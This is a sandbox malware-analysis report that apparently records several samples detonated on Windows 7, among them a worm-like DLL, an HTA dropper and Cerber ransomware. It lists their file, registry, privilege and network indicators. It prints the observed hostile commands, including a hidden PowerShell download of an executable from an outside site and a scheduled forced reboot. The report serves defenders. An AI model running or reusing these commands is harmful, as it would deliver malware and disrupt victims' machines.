N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8136.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\javafx-src.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8136.tmp N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27

C:\Users\Admin\AppData\Local\Temp\8136.tmp

"C:\Users\Admin\AppData\Local\Temp\8136.tmp" \\.\pipe\{4D5A61E3-78D6-4AC0-943E-7442F441CAB3}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
N/A 10.127.0.0:445 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 52.185.211.133:445 settings-win.data.microsoft.com tcp
N/A 10.127.0.1:445 tcp
DE 49.12.169.208:445 tcp
DE 49.12.169.208:139 tcp
N/A 10.127.0.1:139 tcp
US 52.185.211.133:139 settings-win.data.microsoft.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
N/A 10.127.0.0:139 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
N/A 10.127.0.8:445 tcp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/2632-0-0x00000000029F0000-0x0000000002A4E000-memory.dmp

memory/2632-8-0x00000000029F0000-0x0000000002A4E000-memory.dmp

memory/2632-11-0x00000000029F0000-0x0000000002A4E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8136.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/2632-9-0x00000000029F0000-0x0000000002A4E000-memory.dmp

memory/2632-22-0x00000000029F0000-0x0000000002A4E000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win7-20241010-en

Max time kernel

15s

Max time network

19s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\30454.exe');

Network

Country Destination Domain Proto
US 8.8.8.8:53 french-cooking.com udp
FR 54.36.91.62:80 french-cooking.com tcp

Files

memory/2476-0-0x0000000002750000-0x0000000002770000-memory.dmp

memory/2476-2-0x0000000002750000-0x0000000002770000-memory.dmp

memory/2476-1-0x0000000002750000-0x0000000002770000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-26 15:24

Reported

2024-11-26 15:27

Platform

win7-20240903-en

Max time kernel

119s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cerber.exe"

Signatures

Cerber

ransomware cerber

Cerber family

cerber

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A

Contacts a large (1098) amount of remote hosts

discovery

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\documents C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp7899.bmp" C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification \??\c:\program files (x86)\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\steam C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\ C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\the bat! C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\thunderbird C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\program files (x86)\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\desktop C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word C:\Users\Admin\AppData\Local\Temp\cerber.exe N/A
